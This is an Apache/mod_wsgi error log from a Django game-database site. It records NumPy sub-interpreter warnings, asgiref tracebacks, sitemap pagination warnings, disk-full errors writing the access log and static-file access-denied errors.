[Fri Dec 03 01:33:48.406772 2021] [wsgi:error] [pid 86711:tid 139816813848320] [remote 112.215.240.185:63972] /home/temperantia/All_TavernofSoul/TavernofSoul/Items/views.py:17: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 01:33:48.406850 2021] [wsgi:error] [pid 86711:tid 139816813848320] [remote 112.215.240.185:63972] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 01:33:48.406856 2021] [wsgi:error] [pid 86711:tid 139816813848320] [remote 112.215.240.185:63972]   import numpy as np
Exception ignored in: <function Local.__del__ at 0x7f2997b29c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
Exception ignored in: <function Local.__del__ at 0x7f2997b29c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 01:36:12.351790 2021] [wsgi:error] [pid 87679:tid 139631954024192] [remote 112.215.240.185:9906] /home/temperantia/All_TavernofSoul/TavernofSoul/Items/views.py:17: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 01:36:12.351849 2021] [wsgi:error] [pid 87679:tid 139631954024192] [remote 112.215.240.185:9906] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 01:36:12.351853 2021] [wsgi:error] [pid 87679:tid 139631954024192] [remote 112.215.240.185:9906]   import numpy as np
Exception ignored in: <function Local.__del__ at 0x7efe91329c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 01:36:32.029689 2021] [wsgi:error] [pid 87933:tid 140590086801152] [remote 112.215.240.185:18085] /home/temperantia/All_TavernofSoul/TavernofSoul/Items/views.py:17: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 01:36:32.029743 2021] [wsgi:error] [pid 87933:tid 140590086801152] [remote 112.215.240.185:18085] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 01:36:32.029747 2021] [wsgi:error] [pid 87933:tid 140590086801152] [remote 112.215.240.185:18085]   import numpy as np
Exception ignored in: <function Local.__del__ at 0x7fdda65c8c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 01:37:57.406301 2021] [wsgi:error] [pid 88399:tid 140126625511168] [remote 112.215.240.185:26327] /home/temperantia/All_TavernofSoul/TavernofSoul/Items/views.py:17: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 01:37:57.406360 2021] [wsgi:error] [pid 88399:tid 140126625511168] [remote 112.215.240.185:26327] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 01:37:57.406365 2021] [wsgi:error] [pid 88399:tid 140126625511168] [remote 112.215.240.185:26327]   import numpy as np
Exception ignored in: <function Local.__del__ at 0x7f71bdea7c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
Exception ignored in: <function Local.__del__ at 0x7f71bdea7c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 03:03:21.698773 2021] [wsgi:error] [pid 96528:tid 140593961182976] [remote 65.154.226.165:33308] /home/temperantia/All_TavernofSoul/TavernofSoul/Items/views.py:17: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 03:03:21.698969 2021] [wsgi:error] [pid 96528:tid 140593961182976] [remote 65.154.226.165:33308] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 03:03:21.698978 2021] [wsgi:error] [pid 96528:tid 140593961182976] [remote 65.154.226.165:33308]   import numpy as np
Exception ignored in: <function Local.__del__ at 0x7fde8d49cc10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 03:06:32.100160 2021] [wsgi:error] [pid 97677:tid 139664820438784] [remote 126.94.224.106:53943] /home/temperantia/All_TavernofSoul/TavernofSoul/Items/views.py:17: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 03:06:32.100218 2021] [wsgi:error] [pid 97677:tid 139664820438784] [remote 126.94.224.106:53943] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 03:06:32.100223 2021] [wsgi:error] [pid 97677:tid 139664820438784] [remote 126.94.224.106:53943]   import numpy as np
Exception ignored in: <function Local.__del__ at 0x7f063c30bc10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 03:19:08.183789 2021] [wsgi:error] [pid 98070:tid 139843683251968] [remote 131.129.205.218:56877] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 03:19:08.184081 2021] [wsgi:error] [pid 98070:tid 139843683251968] [remote 131.129.205.218:56877] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 03:19:08.184095 2021] [wsgi:error] [pid 98070:tid 139843683251968] [remote 131.129.205.218:56877]   __import__(dependency)
[Fri Dec 03 06:48:53.581267 2021] [wsgi:error] [pid 101753:tid 139843658073856] [remote 216.244.66.239:60356] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 06:48:53.581859 2021] [wsgi:error] [pid 101753:tid 139843658073856] [remote 216.244.66.239:60356] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 06:48:53.581873 2021] [wsgi:error] [pid 101753:tid 139843658073856] [remote 216.244.66.239:60356]   __import__(dependency)
[Fri Dec 03 07:29:02.104962 2021] [wsgi:error] [pid 102808:tid 139843683251968] [remote 123.218.87.0:14388] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 07:29:02.106129 2021] [wsgi:error] [pid 102808:tid 139843683251968] [remote 123.218.87.0:14388] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 07:29:02.106138 2021] [wsgi:error] [pid 102808:tid 139843683251968] [remote 123.218.87.0:14388]   __import__(dependency)
[Fri Dec 03 07:38:15.498704 2021] [wsgi:error] [pid 138271:tid 139843683251968] [remote 185.191.171.13:61492] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 07:38:15.499312 2021] [wsgi:error] [pid 138271:tid 139843683251968] [remote 185.191.171.13:61492] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 07:38:15.499324 2021] [wsgi:error] [pid 138271:tid 139843683251968] [remote 185.191.171.13:61492]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e2c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 07:38:31.407295 2021] [wsgi:error] [pid 138569:tid 139843683251968] [remote 185.191.171.13:55798] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 07:38:31.407370 2021] [wsgi:error] [pid 138569:tid 139843683251968] [remote 185.191.171.13:55798] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 07:38:31.407430 2021] [wsgi:error] [pid 138569:tid 139843683251968] [remote 185.191.171.13:55798]   __import__(dependency)
Exception ignored in: <function Local.__del__ at 0x7f2fdd3e2c10>
Traceback (most recent call last):
  File "/home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/asgiref/local.py", line 96, in __del__
NameError: name 'TypeError' is not defined
[Fri Dec 03 07:40:37.162683 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 185.191.171.10:57206] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Fri Dec 03 07:40:37.163321 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 185.191.171.10:57206] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Fri Dec 03 07:40:37.163334 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 185.191.171.10:57206]   __import__(dependency)
[Fri Dec 03 10:15:28.150793 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Fri Dec 03 10:15:28.158438 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 03 10:15:33.513331 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Fri Dec 03 10:15:33.516922 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 03 10:15:34.399760 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Fri Dec 03 10:15:34.399806 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 03 10:15:40.090311 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Fri Dec 03 10:15:40.092424 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 03 10:15:40.195663 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Fri Dec 03 10:15:40.195703 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617]   return paginator.Paginator(self._items(), self.limit)
[Fri Dec 03 10:15:40.394394 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Fri Dec 03 10:15:40.394442 2021] [wsgi:error] [pid 139181:tid 139843658073856] [remote 66.249.79.74:49617]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 04 00:00:05.745419 2021] [wsgi:error] [pid 139191:tid 139843581499136] [client 206.189.33.118:48954] Truncated or oversized response headers received from daemon process 'django_jtos': /home/temperantia/All_TavernofSoul/TavernofSoul/TavernofSoul/wsgi_jtos.py
[Sat Dec 04 00:01:03.786753 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 185.191.171.2:51748] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/pandas/__init__.py:11: UserWarning: NumPy was imported from a Python sub-interpreter but NumPy does not properly support sub-interpreters. This will likely work for most users but might cause hard to track down issues or subtle bugs. A common user of the rare sub-interpreter feature is wsgi which also allows single-interpreter mode.
[Sat Dec 04 00:01:03.787112 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 185.191.171.2:51748] Improvements in the case of bugs are welcome, but is not on the NumPy roadmap, and full support may require significant effort to achieve.
[Sat Dec 04 00:01:03.787119 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 185.191.171.2:51748]   __import__(dependency)
[Sat Dec 04 11:19:25.771059 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Attributes.models.Attributes'> QuerySet.
[Sat Dec 04 11:19:25.771828 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 04 11:19:26.296901 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Buffs.models.Buffs'> QuerySet.
[Sat Dec 04 11:19:26.296941 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 04 11:19:26.766846 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Items.models.Items'> QuerySet.
[Sat Dec 04 11:19:26.766883 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 04 11:19:31.340043 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Jobs.models.Jobs'> QuerySet.
[Sat Dec 04 11:19:31.340116 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 04 11:19:31.403800 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Maps.models.Maps'> QuerySet.
[Sat Dec 04 11:19:31.403853 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 04 11:19:31.502633 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875] /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/3.8/lib/python3.8/site-packages/django/contrib/sitemaps/__init__.py:115: UnorderedObjectListWarning: Pagination may yield inconsistent results with an unordered object_list: <class 'Skills.models.Skills'> QuerySet.
[Sat Dec 04 11:19:31.502677 2021] [wsgi:error] [pid 153899:tid 139843683251968] [remote 66.249.79.71:42875]   return paginator.Paginator(self._items(), self.limit)
[Sat Dec 04 21:24:44.283492 2021] [log_config:warn] [pid 153935:tid 139843480786688] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.285868 2021] [log_config:warn] [pid 153935:tid 139843480786688] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.309166 2021] [log_config:warn] [pid 153935:tid 139843556321024] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.323201 2021] [log_config:warn] [pid 153935:tid 139843438823168] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.324982 2021] [log_config:warn] [pid 153935:tid 139843691644672] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.327169 2021] [log_config:warn] [pid 153935:tid 139843598284544] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.356436 2021] [log_config:warn] [pid 153935:tid 139843674859264] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.359043 2021] [log_config:warn] [pid 153935:tid 139843489179392] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.360925 2021] [log_config:warn] [pid 153935:tid 139843522750208] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.362689 2021] [log_config:warn] [pid 153935:tid 139843422037760] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.364187 2021] [log_config:warn] [pid 153935:tid 139843683251968] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.366219 2021] [log_config:warn] [pid 153935:tid 139843430430464] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.367811 2021] [log_config:warn] [pid 153935:tid 139843514357504] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.369722 2021] [log_config:warn] [pid 153935:tid 139843447215872] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSoul/jtos/access.log
[Sat Dec 04 21:24:44.372069 2021] [log_config:warn] [pid 153935:tid 139843472393984] (28)No space left on device: [client 159.223.38.203:53901] AH00646: Error writing to /home/temperantia/All_TavernofSoul/TavernofSou[Sun Dec 05 00:29:56.440712 2021] [authz_core:error] [pid 153908:tid 139843556321024] [client 116.102.218.37:55899] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/2091
[Sun Dec 05 00:31:03.382553 2021] [authz_core:error] [pid 153935:tid 139843497572096] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.384722 2021] [authz_core:error] [pid 153908:tid 139843438823168] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.609956 2021] [authz_core:error] [pid 153908:tid 139843589891840] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.614942 2021] [authz_core:error] [pid 153935:tid 139843480786688] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.678384 2021] [authz_core:error] [pid 153908:tid 139843497572096] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.679971 2021] [authz_core:error] [pid 153935:tid 139843589891840] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.722357 2021] [authz_core:error] [pid 153908:tid 139843422037760] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.729974 2021] [authz_core:error] [pid 153935:tid 139843464001280] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.767544 2021] [authz_core:error] [pid 153908:tid 139843455608576] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.786144 2021] [authz_core:error] [pid 153908:tid 139843430430464] [client 116.102.218.37:55905] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.786828 2021] [authz_core:error] [pid 153935:tid 139843505964800] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.818480 2021] [authz_core:error] [pid 153908:tid 139843447215872] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.824770 2021] [authz_core:error] [pid 153935:tid 139843547928320] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.834672 2021] [authz_core:error] [pid 153908:tid 139843683251968] [client 116.102.218.37:55905] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.853194 2021] [authz_core:error] [pid 153908:tid 139843464001280] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.867109 2021] [authz_core:error] [pid 153935:tid 139843472393984] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.872915 2021] [authz_core:error] [pid 153908:tid 139843514357504] [client 116.102.218.37:55905] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.890418 2021] [authz_core:error] [pid 153908:tid 139843581499136] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.904498 2021] [authz_core:error] [pid 153935:tid 139843489179392] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.924248 2021] [authz_core:error] [pid 153908:tid 139843547928320] [client 116.102.218.37:55905] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.929398 2021] [authz_core:error] [pid 153908:tid 139843564713728] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.957129 2021] [authz_core:error] [pid 153935:tid 139843691644672] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.985806 2021] [authz_core:error] [pid 153908:tid 139843505964800] [client 116.102.218.37:55905] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:03.999634 2021] [authz_core:error] [pid 153935:tid 139843556321024] [client 116.102.218.37:55903] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
[Sun Dec 05 00:31:04.019101 2021] [authz_core:error] [pid 153908:tid 139843480786688] [client 116.102.218.37:55902] AH01630: client denied by server configuration: /home/temperantia/All_TavernofSoul/TavernofSoul/staticfiles_jtos, referer: https://jtos.tavernofsoul.com/maps/1631
